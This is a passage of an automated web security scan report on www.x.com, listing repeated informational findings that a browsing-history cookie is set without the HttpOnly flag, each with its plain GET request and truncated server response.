User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313535313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333335313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335343b3130322c333335353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:03 GMT; Path=/
Vary: User-Agent
JP: D=196106 t=1313157243446476
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.107. https://www.x.com/docs/DOC-1613  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1613

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1613 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=254809 t=1313157226947806
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.108. https://www.x.com/docs/DOC-2241  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.109. https://www.x.com/docs/DOC-2346  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2346

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-2346 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323334363b3130322c313433313b3130322c313130363b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:11 GMT; Path=/
Vary: User-Agent
JP: D=90261 t=1313157251251583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.110. https://www.x.com/docs/DOC-3201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3201

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3201 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333230313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333332323b3130322c313535313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333335343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:04 GMT; Path=/
Vary: User-Agent
JP: D=167625 t=1313157243865563
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.111. https://www.x.com/docs/DOC-3212  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3212

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3212 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337343b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=98683 t=1313157237758028
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.112. https://www.x.com/docs/DOC-3251  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3251

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3251 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333235313b3130322c333432373b3130322c333337353b3130322c333432363b3130322c333433313b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:55 GMT; Path=/
Vary: User-Agent
JP: D=152122 t=1313157235677820
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.113. https://www.x.com/docs/DOC-3271  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3271

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3271 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333237313b3130322c333335333b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=202196 t=1313157242055016
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.114. https://www.x.com/docs/DOC-3321  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3321

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3321 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b3130322c333231323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=175031 t=1313157241647991
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.115. https://www.x.com/docs/DOC-3322  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3322

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3322 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332323b3130322c333335313b3130322c333335353b3130322c333335323b3130322c333335343b3130322c333335333b3130322c333334353b3130322c333332333b3130322c333231323b3130322c333337313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=109738 t=1313157241231678
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.116. https://www.x.com/docs/DOC-3323  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3323

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3323 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337343b3130322c333337323b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=133918 t=1313157238141945
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.117. https://www.x.com/docs/DOC-3345  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3345

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3345 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333334353b3130322c333337313b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333332333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=125907 t=1313157238612169
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.118. https://www.x.com/docs/DOC-3351  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3351

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3351 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333334353b3130322c333335343b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=138250 t=1313157240721784
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.119. https://www.x.com/docs/DOC-3352  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3352

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3352 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335323b3130322c333335333b3130322c333332333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=134617 t=1313157240348745
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.120. https://www.x.com/docs/DOC-3353  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3353

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3353 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=99945 t=1313157239993132
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.121. https://www.x.com/docs/DOC-3354  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3354

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335343b3130322c333335353b3130322c333337313b3130322c333332333b3130322c333334353b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=125676 t=1313157239533114
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.122. https://www.x.com/docs/DOC-3355  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3355

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3355 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335353b3130322c333334353b3130322c333231323b3130322c333332333b3130322c333337313b3130322c333337333b3130322c333337323b3130322c333337343b3130322c333235313b3130322c333337353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=160248 t=1313157238946488
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.123. https://www.x.com/docs/DOC-3371  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3371

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3371 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=131293 t=1313157237278257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.124. https://www.x.com/docs/DOC-3372  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3372

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337323b3130322c333337333b3130322c333337353b3130322c333235313b3130322c333337343b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=129449 t=1313157236932252
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.125. https://www.x.com/docs/DOC-3373  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3373

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3373 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=131465 t=1313157236591127
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.126. https://www.x.com/docs/DOC-3374  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3374

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
